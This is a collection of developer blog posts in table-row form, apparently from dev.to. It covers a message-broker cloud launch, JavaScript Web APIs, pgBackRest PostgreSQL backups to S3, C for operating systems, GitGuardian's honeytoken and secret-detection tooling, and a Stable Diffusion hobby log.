Message brokers need to evolve to handle the vast amount and complexity of events that occur, and they need to incorporate three critical elements: reliability; ease of management and scale; and what we call the "Day 2" operations on top, to help build queue-based, stream-driven applications in minutes.
To support both the small and the massive scale and workloads Memphis is built for, some key features could only be delivered via the cloud.
Key features in Memphis Cloud include:
1. Augmenting Kafka clusters – providing the missing piece in modern stream processing with the ability to augment Kafka clusters;
2. Schemaverse – Enabling built-in schema management, enforcement, and transformation to ensure data quality as our data gets complicated and branched;
3. Multi-tenancy – Offering the perfect solution for users of SaaS platforms who want to isolate traffic between their customers;
4. True multi-cloud – creating primary instances on GCP, and a replica on AWS.
**3. A Developer-Centric Approach (and Obsession)**
Memphis.dev’s cloud service launch is driven by a developer-centric philosophy, recognizing that developers are the driving force behind technological innovation. With a deep understanding of developers’ and data engineers’ needs, especially in the current era of much more complicated pipelines with much fewer hands, Memphis.dev has created a comprehensive suite of out-of-the-box tools and features tailored specifically to enhance productivity, streamline workflows, and facilitate collaboration. By prioritizing the developer experience, Memphis.dev aims to empower developers to focus on what they do best: writing exceptional code, and extracting value out of their data!
**4. No code changes. Open-source to Cloud.**
The development experience is fully aligned between the open-source version and the cloud. No code changes are needed, nor any application config modification.
The cloud does introduce one additional parameter, which is not mandatory: an account ID.
**5. Enhanced Security and Compliance**:
Memphis.dev prioritizes the security and compliance of its cloud service, recognizing the critical importance of protecting sensitive data. With robust security measures, including data encryption, role-based identity and access management, integration with 3rd party identity managers, and regular security audits, Memphis.dev ensures that developers’ applications and data are safeguarded. By adhering to industry-standard compliance frameworks, Memphis.dev helps developers meet regulatory requirements and build applications with confidence.
**6. Support and Success**
The core support and customer service ethos of Memphis.dev is customer success and enablement. A successful customer is a happy customer, and we work hard to support our customers not just with Memphis, but with their bigger picture and data journey: three global customer support teams spread across three different time zones, alongside highly experienced data engineers and data architects who act as Customer Success Engineers and are willing to dive into our customers' internals and help them achieve their goals.
---
“Cluster setup, fault tolerance, high availability, data replication, performance tuning, multitenancy, security, monitoring, and troubleshooting all are headaches everyone who has deployed traditional message broker platforms is familiar with,” said Torsten Volk, senior analyst, EMA. “Memphis however is incredibly simple so that I had my first Python app sending and receiving messages in less than 15 minutes.”
“The world is asynchronous and built out of events. Message brokers are the engine behind their flow in the modern software architecture, and when we looked at the bigger picture and the role message brokers play, we immediately understood that the modern message broker should be much more intelligent and by far with much less friction,” said Yaniv Ben Hemo, co-founder and CEO, Memphis. “With that idea, we built Memphis.dev which takes five minutes on average for a user to get to production and start building queue-based applications and distributed streaming pipelines.”
---
[Join 4500+ others and sign up for our data engineering newsletter.](https://share.hsforms.com/1lBALaPyfSRS3FLLLy_Hsfgcqtej)
Originally published at Memphis.dev by Yaniv Ben Hemo, Co-Founder & CEO at [Memphis.dev](https://memphis.dev/blog/)
Follow Us to get the latest updates!
[Github](https://github.com/memphisdev/memphis) • [Docs](https://docs.memphis.dev/memphis/getting-started/readme) • [Discord](https://discord.com/invite/DfWFT7fzUu)
| atrifsik | |
1,525,531 | Let's build a simple interpreter from scratch in Python, pt.11: Parser | Simple parser in Python... | 0 | 2023-07-04T06:17:43 | https://dev.to/smadev/lets-build-a-simple-interpreter-from-scratch-in-python-pt11-parser-1c0o | python, programming, interpreter | {% embed https://m.youtube.com/watch?v=ioaC-YmZZHE %} | smadev |
1,527,237 | JavaScript Web APIs Series: Introduction | When talking about technology in the context of software and especially web and internet... | 23,677 | 2023-07-07T18:37:28 | https://olodocoder.hashnode.dev/javascript-web-apis-series-introduction | javascript, webdev, api, programming | When talking about technology in the context of software and especially web and internet applications, it is safe to say that Application Programming Interfaces, commonly known as APIs, are one of the most essential tools that enable developers to build useful and functional applications because they allow things that would be otherwise impossible become possible.
In this part of the series, you will learn about JavaScript, the web, and APIs, and how they help you build applications with much more functionality than you would otherwise be able to. You will also explore what JavaScript Web APIs are and how they differ from the traditional APIs you're already familiar with.
> _Note: If you are already familiar with the basics of JavaScript, how the web works, and what APIs are, You might want to skip to the next part of the series to start exploring JavaScript Web APIs and what they are capable of._
So first, let's explore how the web works in the next section.
## Web
The World Wide Web has become an integral part of our daily lives, connecting people and information across the globe. Behind the scenes, the web operates on a complex system of technologies and protocols that enable the creation, delivery, and consumption of web content. In the context of software development, understanding how the web works is crucial for building efficient, scalable, and secure applications.
At the core of the web lies the client-server model, where clients, usually web browsers or mobile apps, request resources from servers. When a user enters a URL in their browser, it initiates an HTTP (Hypertext Transfer Protocol) request to the appropriate server. The server processes the request and sends back a response containing the requested data, typically in HTML, JSON, XML, or other file formats.
Next, let's see what JavaScript is in the next section.
## JavaScript
JavaScript is a versatile programming language created by Brendan Eich in 1995. It enables developers to add interactivity and dynamic behavior to web applications. It runs directly in the browser, allowing developers to manipulate web page elements, respond to user actions, and fetch data from servers asynchronously.
It facilitates the creation of interactive forms, animations, and complex user interfaces. With the advent of frameworks like React, Angular, Vue.js, and many others, JavaScript has evolved into a robust ecosystem that powers sophisticated web applications.
Over the years, JavaScript has grown beyond the scope of just web browsers with the advent of tools like Node.js for server-side development, React Native for mobile apps, Electron for desktop apps, Brain.js for machine learning, Cylon.js for IoT, and so much more.
These tools enable JavaScript developers to build different software applications without the need to learn other programming languages, thus making them more powerful and versatile in the tech ecosystem.
## Application Programming Interfaces (APIs)
Application Programming Interfaces (APIs) enable data exchange and functionality between different software systems. APIs define rules and protocols for how different software components interact and share resources. With architectural standards such as Representational State Transfer (REST) or GraphQL, APIs provide standardized methods for accessing and manipulating data over the web.
APIs are crucial for building distributed systems, enabling software developers to leverage external functionality and integrate their applications with third-party services.
Now that you know how the web works, what JavaScript is, and what APIs do, let's explore JavaScript Web APIs, how they work, and how they differ from regular APIs in the next section.
## JavaScript Web APIs
JavaScript Web APIs are a collection of functions and protocols that enable JavaScript to interact with web browsers and other web services.
As mentioned earlier, APIs define rules and protocols for how software applications interact; JavaScript Web APIs, on the other hand, define the standard for how certain things are done in the JavaScript ecosystem. You can think of them as enhancements to the capabilities of JavaScript.
### How JavaScript Web APIs Work
JavaScript Web APIs are a set of functions that give you access to certain parts and functionality of the browser, smartphone, or any other client that supports the API so that you can enhance the functionalities of your website or app without the need to learn another language or even installing another dependency into your application codebase.
While a lot of the JavaScript Web APIs are ready to use and supported by major web browsers and smartphones, some of them are still in "Experimental" mode; this means you need to specifically check whether the platforms you're building for support them before using them, to avoid wasting development time.
## Types of JavaScript Web APIs

There are different types of JavaScript Web APIs, and they all help developers build different features and functionalities; in fact, there are over a hundred of them.
That said, you can use them alone or combine multiple to create something unique for your applications—more on how to do that in the following parts of the series.
Now that you understand that there are a lot of JavaScript Web APIs let's take a look at them briefly in different categories in the following sections.
### Audio and Video APIs
The Audio and Video category of JavaScript Web APIs provides functionality for handling multimedia content. This includes APIs for playing audio and video files, capturing audio and video from devices, and manipulating media streams.
These APIs can be used to create interactive media players, video conferencing applications, audio recording tools, and much more.
### Background and Synchronization APIs
The Background and Synchronization category includes APIs that allow JavaScript applications to perform tasks in the background and synchronize data across different devices or browser instances.
These APIs enable developers to build features such as background data synchronization, push notifications, periodic background tasks, and offline data caching.
### Device and Sensor APIs
This category of APIs provides access to various device-specific functionalities and sensor data. It includes APIs for accessing information about the user's device, such as battery status, network connectivity, geolocation, and orientation.
These APIs enable developers to create location-based services, augmented reality applications, device-specific optimizations, and more.
### Document Object Model (DOM) Manipulation APIs
DOM Manipulation APIs allow JavaScript to interact with the HTML document structure, its elements, and its styles and attributes.
These APIs enable developers to dynamically modify the content and appearance of web pages, handle user interactions, and create responsive and interactive web applications.
### File and Storage APIs
The File and Storage category provides APIs for working with files and data storage on the client side. It includes APIs for reading and writing files, accessing local file systems, managing client-side databases, and storing data using key-value pairs or structured storage.
These APIs are useful for building applications that require local data persistence, file management, or offline functionality.
### Input and Events APIs
The Input and Events category covers user input and event-handling APIs. These APIs allow developers to capture and respond to user interactions, such as mouse clicks, keyboard inputs, touch gestures, and other events.
They also include APIs for handling input from various devices, such as game controllers or stylus pens.
### Networking and Communication APIs
Networking and Communication APIs help facilitate communication between web applications and remote servers.
These APIs enable sending HTTP requests, fetching and manipulating data from remote sources, establishing WebSocket connections for real-time communication, and implementing server-side communication protocols such as WebRTC.
They are fundamental for building web applications that interact with backend services or provide real-time collaboration features.
### Performance and Optimization APIs
The Performance and Optimization category includes APIs that help developers optimize the performance of their web applications.
These APIs provide tools for measuring and analyzing performance metrics, optimizing rendering and layout, managing memory and resources, and improving overall application speed and responsiveness.
### Security and Privacy APIs
Security and Privacy APIs offer mechanisms to protect user data and enhance web application security.
They include APIs for handling user authentication and authorization, securing network communications using encryption and certificates, managing browser permissions, and preventing common security vulnerabilities like cross-site scripting (XSS) or cross-site request forgery (CSRF).
### User Interface and Presentation APIs
The User Interface and Presentation category encompasses APIs for creating and managing user interfaces, including graphical elements and visual effects.
These APIs allow developers to dynamically manipulate styles and layouts, animate page elements, create custom UI components, and implement responsive design patterns. They are vital for creating visually appealing and interactive web applications.
## Conclusion
And that's it! I hope this article achieved its aim of showing you that much more is possible with JavaScript beyond the regular stuff you already use it for. You also explore the different categories of JavaScript Web APIs and what they can help you build.
In the following parts of the series, we will explore all the JavaScript Web APIs under each category, what they can do, how to use them, and much more. Thanks again for reading, and don't forget to follow me here on Dev and [Twitter](https://twitter.com/olodocoder). See you in the next one! | olodocoder |
1,564,697 | pgBackRest: PostgreSQL S3 backups | This tutorial explains how to back up a PostgreSQL database using pgBackRest and S3. ... | 0 | 2023-08-10T11:48:37 | https://bun.uptrace.dev/postgres/pgbackrest-s3-backups.html | postgres, s3 | This tutorial explains how to back up a PostgreSQL database using [pgBackRest](https://pgbackrest.org/) and S3.
## Introduction
pgBackRest is a modern PostgreSQL Backup & Restore solution that has all the features you may ever need:
- Parallel backup and restore.
- Full, differential, and incremental backups.
- Delta restore.
- ZSTD compression.
- Encryption.
- And [many more](https://pgbackrest.org/).
## Installation
Ubuntu provides pre-compiled packages for pgbackrest:
```shell
sudo apt install pgbackrest
```
## Terms
**Stanza** is a pgBackRest configuration for a PostgreSQL database cluster. Most db servers only have one db cluster and therefore one stanza.
**Repository** is where pgBackRest stores backups and archives WAL segments.
## Configuration
Let's create a basic directory structure for configs and logs:
```shell
mkdir -m 770 /var/log/pgbackrest
chown postgres:postgres /var/log/pgbackrest
mkdir /etc/pgbackrest
```
And save the following config in `/etc/pgbackrest/pgbackrest.conf`:
```ini
[demo]
pg1-path=/var/lib/postgresql/14/main
[global]
repo1-retention-full=3 # keep last 3 backups
repo1-type=s3
repo1-path=/s3-path
repo1-s3-region=us-east-1
repo1-s3-endpoint=s3.amazonaws.com
repo1-s3-bucket=s3_bucket_name
repo1-s3-key=$AWS_ACCESS_KEY
repo1-s3-key-secret=$AWS_SECRET_KEY
# Force a checkpoint to start backup immediately.
start-fast=y
# Use delta restore.
delta=y
# Enable ZSTD compression.
compress-type=zst
compress-level=6
log-level-console=info
log-level-file=debug
```
For [point-in-time recovery](https://www.postgresql.org/docs/current/continuous-archiving.html), you also need to configure PostgreSQL (in `postgresql.conf`) to upload WAL files to S3:
```ini
archive_mode = on
archive_command = 'pgbackrest --stanza=demo archive-push %p'
archive_timeout = 300
```
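Before taking the first backup, the stanza must be created, and you can verify the whole setup with the `check` command:

```shell
sudo -u postgres pgbackrest --stanza=demo stanza-create
sudo -u postgres pgbackrest --stanza=demo check
```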
## Full backup
Full backup copies all files in a database cluster.
```shell
sudo -u postgres pgbackrest --type=full --stanza=demo backup
```
## Differential backup
Differential backup only copies files that have changed since the last full backup. It is smaller than a full backup, but to restore it you will need the base full backup.
```shell
sudo -u postgres pgbackrest --type=diff --stanza=demo backup
```
## Incremental backup
Incremental backup only copies files that have changed since the last backup (full, differential, or incremental). It is smaller than a full or differential backup, but to restore it you will need all dependant backups.
```shell
sudo -u postgres pgbackrest --type=incr --stanza=demo backup
```
## Backup restore
To restore the cluster from the last backup:
```shell
sudo -u postgres pgbackrest --stanza=demo --delta restore
```
To view all available backups:
```shell
sudo -u postgres pgbackrest --stanza=demo info
```
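With WAL archiving configured as above, you can also restore to a specific moment in time. A sketch (stop PostgreSQL first and adjust the timestamp to your needs):

```shell
sudo -u postgres pgbackrest --stanza=demo --delta \
    --type=time "--target=2023-08-10 10:00:00+00" restore
```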
## PostgreSQL monitoring
To [monitor PostgreSQL](https://uptrace.dev/blog/postgresql-monitoring-tools.html), you can use [OpenTelemetry PostgreSQL](https://uptrace.dev/get/monitor/opentelemetry-postgresql.html) receiver that comes with OpenTelemetry Collector.
[OpenTelemetry Collector](https://uptrace.dev/opentelemetry/collector.html) is designed to collect, process, and export telemetry data from multiple sources. It acts as a centralized and flexible data pipeline that simplifies the management of telemetry data in distributed systems.
Uptrace is a [OpenTelemetry backend](https://uptrace.dev/blog/opentelemetry-backend.html) that supports distributed tracing, metrics, and logs. You can use it to monitor applications and troubleshoot issues.

Uptrace comes with an intuitive query builder, rich dashboards, alerting rules with notifications, and integrations for most languages and frameworks.
Uptrace can process billions of spans and metrics on a single server and allows you to monitor your applications at 10x lower cost.
In just a few minutes, you can try Uptrace by visiting the [cloud demo](https://app.uptrace.dev/play) (no login required) or running it locally with [Docker](https://github.com/uptrace/uptrace/tree/master/example/docker). The source code is available on [GitHub](https://github.com/uptrace/uptrace).
## Conclusion
pgBackRest is a reliable backup tool that requires minimal configuration. To achieve a good balance between backup size and restoration time, you can create a full backup weekly and a differential/incremental backup daily.
- [OpenTelemetry Architecture](https://uptrace.dev/opentelemetry/architecture.html)
- [Jaeger Alternatives](https://uptrace.dev/blog/jaeger-alternatives.html)
| vmihailenco |
1,573,571 | The Relevance of C in Building Efficient Operating Systems | Harnessing C’s Power: The Unrivaled Choice for Operating System Development ... | 0 | 2023-08-20T00:05:34 | https://dev.to/eztosin/the-relevance-of-c-in-building-efficient-operating-systems-995 | c | ## Harnessing C’s Power: The Unrivaled Choice for Operating System Development
## Introduction
The creation of a simple, yet powerful tool remains one of the most remarkable innovations the world has ever beheld. This innovation carries the weight of the computing world, revolutionizing how we interact with machines. The C programming language stands as a cornerstone, closely connected to machine language, which empowers developers to explore and manipulate computer systems to change the scope of the world of technology.
As the successor to a previous programming language called B, C was developed in the 1970s by Dennis Ritchie at Bell Laboratories in the USA. It quickly became a cornerstone in the computing world due to its closeness to machine language, empowering developers to explore and manipulate computer systems with unparalleled precision.
In this article, we delve into C's unparalleled relevance and the multitude of benefits it offers. We aim to establish why it deserves its place as the preferred choice for developing operating systems.
## Prerequisites
Before delving into the insights offered in this article, it's recommended that readers possess a fundamental understanding of computer hardware and software concepts. This foundational knowledge will greatly enhance the exploration of the myriad benefits associated with learning the C programming language. Whether you're a novice in the programming world or a seasoned professional versed in other languages, this article will shed light on why C holds a unique place in the realm of programming.
## The Technological Advancement of C
Originally, C was developed to improve the functions of the Unix operating system (an operating system that acts as a link between the computer and the user). Several renowned scientists made significant improvements to the C library and preprocessor (a step in the compilation process), including Alan Snyder, Mike Lesk, and John Reiser. As a result, C was used to develop version 4 of the Unix operating system in November 1973.
During the 1980s, C gained popularity, and the book “The C Programming Language” was well-known even before the official recognition of C by the American National Standards Institute (ANSI). C compilers that translate program code to machine code (represented as 0’s and 1’s) became available for all modern computer architectures, leading to widespread distribution among governmental and academic bodies.
Since its development, many languages have been structured and syntactically influenced by C’s design. C has firmly established its place in the programming world for decades, consistently ranking as one of the top two languages in the TIOBE index, which measures the popularity of programming languages.
## Unveiling C’s Relevance in Operating Systems
Have you ever wondered how your computer or smartphones operate behind the scenes? One of the key players in making these systems efficient and powerful is the C programming language.
C is a language that gives developers a direct and powerful way to interact with the computer’s hardware. This unique ability allows C to efficiently control and utilize computer resources, making it an excellent choice for building operating systems that run smoothly and respond quickly.
Let’s take a moment to understand what “kernel capabilities” mean. The kernel is like the brain of an operating system, handling essential tasks such as managing memory, scheduling processes, and handling input/output. C’s kernel capabilities make it possible for developers to create a solid foundation for operating systems, ensuring they work seamlessly with the hardware.
But what does all this technical jargon really mean? Let’s break it down further! Imagine you’re building a house, and C is like having a magic tool that lets you shape every tiny detail of the structure. It allows developers to create functions and features that fit perfectly into the operating system, like customizing your dream home with all the features you want.
And the best part is, C is not only powerful but also portable. That means the programs you write in C can run on different types of computers without much change to your program. So, whether you’re using a Windows PC, a Mac, or a smartphone, C’s portability makes it adaptable to various systems.
You might wonder, “Who uses C for their operating systems?” Well, some of the biggest tech giants, like Microsoft, Apple, and Google, rely on C to build the core of their operating systems. This showcases C’s reliability and popularity in the tech industry.
## The Power of C’s low-level access
The key to building an efficient operating system lies in the ability of a programming language to manipulate the hardware of the computer and handle certain critical aspects. C programming excels in handling these critical aspects namely:
**Memory Management**: Operating systems need to efficiently manage the computer’s memory to ensure smooth program execution and prevent conflicts. C’s direct access to memory allocation, deallocation, and manipulation makes it well-suited for effective memory management in operating systems (see the short sketch after this list).
**Process Scheduling**: In a multitasking environment, the operating system must efficiently manage processes, allocate resources, and ensure fair execution. C’s versatility allows developers to implement robust process scheduling algorithms.
**File Systems**: Handling data storage and retrieval is crucial for any operating system. C’s capability to interact directly with hardware enables the development of efficient file systems, ensuring quick and reliable data access.
**Interacting with Hardware**: As the heart of an operating system, C’s ability to interact directly with hardware allows developers to control low-level operations.
**Simplicity and Versatility**: C’s simplicity and versatility make it an ideal choice for managing complex algorithms and data structures with concise code, streamlining the operating system development process.
**Maturity and Stability**: With many additions to the C standard library over the years, C still remains an outstanding and reliable programming language. As a result, tech giants rely heavily on C when building technical systems.
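As a tiny illustration of the direct memory control described above, here is a minimal C sketch (a toy example, not actual operating system code):

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(void) {
    /* Request exactly 64 bytes from the allocator; nothing is managed for us */
    char *buffer = malloc(64);
    if (buffer == NULL) {
        return 1; /* allocation can fail, and the programmer must handle it */
    }
    strcpy(buffer, "C hands you the keys to memory");
    printf("%s\n", buffer);
    free(buffer); /* and the responsibility to hand them back */
    return 0;
}
```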
## C’s Role in Embedded Systems
An embedded system refers to a combination of computer hardware and software designed to perform specific tasks. With C’s ability to interact with the hardware and boost the functionality of devices, C has been incorporated to ease human life. Examples of these cases include its use in industrial machines, household electronics, automobiles, medical equipment, and more.
## Enduring Legacy in the Programming Landscape
C continues to be a widely used and respected programming language among developers worldwide. Academic bodies and various computer science programs have continued to incorporate C in their curriculum, as many find it easier to transition to other programming languages after having a strong foundational background in C.
In addition to its position as a fundamental language for beginners, C remains a top choice for developers worldwide due to its inherent advantages. Its portability allows programs written in C to run on different platforms with little or no modifications. Moreover, its efficiency, reliability, and versatility have cemented its place in technological innovations.
## Challenges and Future Prospects
While C has served as the foundation for numerous programming languages and remains the father of languages, it is imperative for programmers to acknowledge its limitations and explore how C may evolve or adapt to meet the changing needs of the evolving technology landscape. The programming community needs to work towards addressing these limitations and continuously improving C’s capabilities.
## Conclusion
Having explored the remarkable journey of C from its development by Dennis Ritchie in 1972 to its continuous significance in modern computer architectures, C has undoubtedly made its mark in the computing field.
Throughout our journey, we delved into C’s unique low-level capabilities that make it stand out from other programming languages: its access to memory allocation and deallocation, which gives programmers precise control over memory and makes it an ideal choice for building technical software and operating systems, and its kernel capabilities, which lay the foundation for robust operating systems and empower developers to build software applications that run smoothly on a wide range of devices.
As we steer into the future of the constantly evolving world of technology, C’s strength and adaptability have positioned it as a critical language for developing efficient and portable innovations. Its versatility and reliability will continue to be sought after for a long period of time.
In conclusion, the path of C programming has been inspiring for ages, from its creation to its current status as a dominant force in the programming world. C has proven to be more than just a tool, impacting the lives of developers and users alike; it has become a legend among languages.
As we embrace the future, let us continue to remember the power of simplicity and efficiency that C brings, propelling us forward into an ever-evolving world of technological innovation. With C on our side, we can continue to boast of reliability and stability in shaping the destiny of technology itself.
## References
1. C (programming language). (2023, July 30). In Wikipedia. https://en.wikipedia.org/wiki/C_(programming_language)
2. Lutkevich, B. (n.d.). Embedded System. TechTarget. https://www.techtarget.com/iotagenda/definition/embedded-system
3. Cognetta, S. (2023, July 26). How to Make a Computer Operating System. Wikihow. https://www.wikihow.com/Make-a-Computer-Operating-System
| eztosin |
1,600,637 | Defending your castle: Raising walls versus detecting intruders | When defending your digital assets in 2023, building a moat and a drawbridge might not be the first... | 0 | 2023-09-14T20:28:43 | https://blog.gitguardian.com/defending-your-castle-raising-walls-versus-detecting-intruders/ | cybersecurity, breach, defense, security | When defending your digital assets in 2023, building a moat and a drawbridge might not be the first thing you think about. You probably wouldn't base your defensive posture on tech like trap doors or guard towers. However, there is a reason these methods have been employed for hundreds of years; they worked, at least when what you were guarding was rooms full of gold or [holy grails](https://blog.gitguardian.com/honeytokens-protect-your-holy-grail/).
[](https://lh5.googleusercontent.com/8Fqlo8zimPT3xOgQebkj0g0yhug1gQzz0U_7jN9rQ7000V8MgPtQF_eHrZ1sZhQSwjkZSS3vLD6p4U75UPiGeXpdZodMq2WiEGpGAdLJTzwxJnKeQo6tEZSU-mB1rDOBPHbqf8oc1l-qUKteyFmpKg)
When they built [ENIAC, the world's first general-use computer](https://www.britannica.com/technology/ENIAC?ref=blog.gitguardian.com#:~:text=Last%20Updated%3A%20Aug%209%2C%202023,John%20Mauchly%2C%20American%20engineer%20J.), in the 1940s, the security strategy was similar to what the Sumerians had devised nearly 6,000 years earlier, basically armed guards defending a locked room. Of course, this made sense as you had to be in the same building to access that room-sized computer, which took as much power as a small city to operate.
Since then, things have changed quite a bit. We have transitioned from a centrally managed workforce, all gathering in a physical office, to a remote and hybrid workforce, with employees accessing sensitive data from various locations and devices. Unsecured Wi-Fi networks, personal devices, and potential exposure to phishing attacks took focus for our security teams. The castle's walls expanded to include home offices, coffee shops, and airports. Defending against such threats became more complex, requiring solutions that go beyond traditional perimeter-based security.
Organizations also shifted from completely owned, on-premise data centers and networks into cloud services and relying on third-party vendors. Digital assets now reside in an ever-diversifying set of services. Protecting our assets in an ever-expanding 'kingdom' of smaller castles of external services we don't own brought a whole new world of challenges.
The world has shifted, and the job of the security professional has forever changed from keeping people out to being able to detect when the wrong persons get in.
Some classical defenses still make sense
----------------------------------------
While it is silly to think of a stone barrier protecting our applications, we do build certain types of walls, Web Application Firewalls, WAFs. While not foolproof, they prevent the most basic types of attacks from granting access. Hardening those WAF rules as new vulnerabilities are revealed is not really that different than reinforcing the castle wall as the enemy devises new battlefield tech.
While a guard tower and drawbridge over a moat might seem like a terrible way to deal with authentication in your production environments, this is the role we see tools like multifactor authentication, MFA, and token-based passwordless systems play. "Who goes there?" is not something someone needs to say out loud, as our digital gatekeepers, like [OAuth](https://oauth.net/?ref=blog.gitguardian.com)-based solutions, say it for us, only lowering the drawbridge once we verify we are who we say we are.
It is still very practical to use a vault to guard your secrets. Today, instead of iron boxes with complex locking mechanisms, we rely on encryption-based solutions like [Vault by HashiCorp](https://www.vaultproject.io/?ref=blog.gitguardian.com), [Doppler](https://www.doppler.com/?ref=blog.gitguardian.com), or [Akeyless](https://www.akeyless.io/?ref=blog.gitguardian.com) to hold our dearest secrets: our credentials.
Modern problems require modern solutions
----------------------------------------
While some [legendary assassins](https://en.wikipedia.org/wiki/Assassin%27s_Creed?ref=blog.gitguardian.com) and thieves could get into strongholds, they were not allowed to ransack the place without someone immediately noticing. Unfortunately, this is exactly what malicious actors are doing these days: sneaking in through doors we leave open and laterally expanding their footprint as rapidly as possible. While overall [dwell times are much lower](https://news.sophos.com/en-us/2023/08/23/active-adversary-for-tech-leaders/?ref=blog.gitguardian.com#:~:text=average.%20In%20the-,first%20half%20of%202023,-%2C%20the%20median%20dwell) today than they were even a few years ago, the fact remains that they are still getting in at alarming rates and, on average, are spending days doing whatever they please before we even detect them being there.
Good news: GitGuardian is here to help ensure you are not leaving those doors open and that those attackers will quickly give themselves away. We focus on helping organizations secure the modern way of building software with our code security solutions, as we will highlight below.
### Keeping the doors shut
Attackers can bypass our current defenses by [leveraging misconfigurations in our infrastructure as Code](https://blog.gitguardian.com/researcher-finds-github-admin-credentials-thanks-to-misconfigurations/), IaC. Unlike castles, which take years to build in some cases and would require many eyes to find defects in materials and design, IaC deployments can be done in minutes and at extreme scale by a single DevOps professional. The nature of IaC means the configuration is likely to be reused over and over again, perhaps hundreds or thousands of times, greatly increasing the potential attack surface. The likelihood that a flaw or misconfiguration sneaks past that single person will never be zero. They need tools to help ensure success.
Helping to ensure common security issues don't make it to production is why we built [Infra as Code Security](https://www.gitguardian.com/infrastructure-as-code?ref=blog.gitguardian.com) into the GitGuardian platform. Now GitGuardian users can leverage both ggshield to manually scan for over 100 common IaC misconfigurations at the local developer level and Infra as Code Security to automatically scan for any of those same issues in code committed to GitHub and GitLab repositories in your perimeter.
We focus on scanning IaC templates like Terraform and CloudFormation for misconfigurations affecting your AWS, Azure, GCP services, Kubernetes clusters, and Docker containers, safeguarding your deployments.
### Bait the traps
Once an attacker is inside, you want them to immediately announce they are inside, preferably over Slack. This does happen occasionally; just[ ask Uber](https://blog.gitguardian.com/uber-breach-2022/). Most of the time, attackers go out of their way to hide their presence. Most attacks follow a similar pattern though, which we can leverage to our advantage. First, they breach to gain an initial foothold, mainly through[ phishing attempts or stolen credentials](https://blog.gitguardian.com/verizon-2023-dbir-credential-leaks/), and then try to expand as fast as possible laterally. They do this by finding any and all credentials left in plaintext throughout the system. From within any system they can access, the attacker will attempt to escalate privileges and then keep moving laterally, sometimes planting malware and sometimes exfiltrating data, sometimes doing both.
Knowing they will look for any credentials to exploit means they will likely also try to use any decoy credentials you leave lying around. This is where [GitGuardian Honeytoken](https://www.gitguardian.com/honeytoken?ref=blog.gitguardian.com) comes in. You can easily create AWS credentials that do not allow any real access to systems or data but instead send you alerts by email or via webhooks that let you know someone is lurking about. Getting their IP address, user agent, what actions they were attempting, and the timestamps of each attempt will help you boot them from the system.
### Clean up any and all real keys around your stronghold
While honeytokens make it easy to deploy decoy credentials, ideally, those would be the only real secrets that any attacker finds. GitGuardian has long been known for our legendary [Secrets Detection](https://www.gitguardian.com/monitor-internal-repositories-for-secrets?ref=blog.gitguardian.com) abilities. No matter how many repos you have or how many developers are in your org, GitGuardian can quickly identify any and all instances of secrets in plaintext throughout your codebase, no matter where it is in the software development lifecycle.
Using [ggshield, you can even stop hardcoded credentials](https://blog.gitguardian.com/how-to-use-ggshield-to-avoid-hardcoded-secrets-cheat-sheet-included/) from ever making it into a commit. And for any incidents where those secrets do make it into your shared repositories, the GitGuardian dashboard makes it very simple to identify the issue and [keep track of the remediation process](https://docs.gitguardian.com/internal-repositories-monitoring/remediate/remediate-incidents?ref=blog.gitguardian.com#collect-the-feedback). Make sure that you are making it as hard as possible for attackers to gain further access when they do make it inside your castle walls.
We must prepare for the breach
------------------------------
Building walls and moats in the form of WAFs and Zero Trust architecture is still important when defending your organization. We can't rely on those tactics alone anymore. The reality is we need to adopt an ["assumed breach" posture](https://blog.marcolancini.it/2021/blog-cloud-security-roadmap/?ref=blog.gitguardian.com). Modern security means reacting so quickly that attackers are left wondering what they could possibly try next. Malicious actors do not have unlimited time or resources; every time we stop their attempts at infiltration, it is one more round won for the good guys.
Make sure you are prepared for modern attacks. Close any doors you might leave open through IaC misconfiguration by scanning early and often. Lay out traps in the form of honeytokens to trick attackers into giving away their position. Make sure those decoy credentials are the only plaintext secrets they find by using GitGuardian Secrets Detection to discover and eliminate any real keys, certificates, or passwords.
No matter what your castle looks like or what treasures you guard, make sure you leverage the power of modern tools to keep your kingdom secure. | dwayne_mcdaniel |
1,633,742 | Expedition logbook: Journey into the world of stable diffusion | This will be a summarization on a high level of my experience and some related learnings from a hobby... | 0 | 2023-11-03T16:56:18 | https://dev.to/charliefoxtrot/expedition-logbook-journey-into-the-world-of-stable-diffusion-104n | writing, learning, stablediffusion, showdev | This will be a summarization on a high level of my experience and some related learnings from a hobby project trying to generate images with stable diffusion in the cloud.
## Intro: Preface & vision
I had previously played around a bit with generating images using Dall-E 2 and similar solutions using some free credits. My problem was this: I kept forgetting to use my free credits and thus not getting them renewed. And when I finally wanted to generate an image I ran out of credits after a few tries.
The initial idea was simply to set up a scheduled generation of images that would make sure to consume all of my free points in the various offerings available and to then automatically push them to some kind of screen or digital photo frame.
The primary images I wanted to generate would be fox-themed pictures tied to my company's branding (more on the exact prompt later).
As I eventually got started on the project I realised that the free offerings of the various resources had been cancelled. Thus I decided to set up my own image generation using open source solutions, with the goal of having it live in the cloud to make it simpler to share and to avoid needing specific local resources.
## Chapter 1: Generating images
As stated in the preface; as a lazy (efficient) developer I started my journey by looking for an open source implementation of one of the image generation models, and ended up with [Stability AI's Stable Diffusion setup](https://github.com/Stability-AI/stablediffusion)
After fighting my Windows installation getting all the python packages, conda installations etc. running I was finally able to generate an image.

Well, that did not go great. So I kept making more images, altering the prompt and the configurations. All of my attempts turned out similar; but why?
To keep runtime low I tried generating images at a 256x256 resolution. I tried altering the prompt, the steps (iterations) as well as the CFG scale (a multiplier for how much the prompt input should dictate the outcome).
But it just turned into different noise; still no images that looked anything like the prompt.
To ensure that my setup wasn't faulty I took a step back and tried some reference prompts and seeds and managed to generate images that looked like the prompt rather than random colourful noise.

### 1.1 What went wrong?
My primary problem was simply that I did not understand well how diffusion models work and what a reasonable prompt (including config) might look like for generating images.
A simplified explanation is that (image) diffusion models are trained on a specific set of images, learning how to remove noise from an image to get closer to the original images they were trained on.
This means that a model cannot generate outputs (in a controlled fashion) it's not trained on. This includes the image resolution, as it's part of the noise removal. Other resolutions might still end up looking good, but they might also cause unexpected corruptions.
Thus in hindsight I realise that I had too low of a CFG scale, too few iterations, and an unexpected resolution, as this model was trained on 512x512 images.
Moving on from this I got back to trying to generate my original prompts, but now with new resolutions, iterations and CFG scale. So what was my prompt? Variations of `Fox working with a laptop in an office drinking a cup of coffee`, with various alterations of phrasing and omitted details. Why this prompt? Well, it's simply a reference to the company I work at, Charlie Foxtrot; a software development consultancy with foxes in our branding.
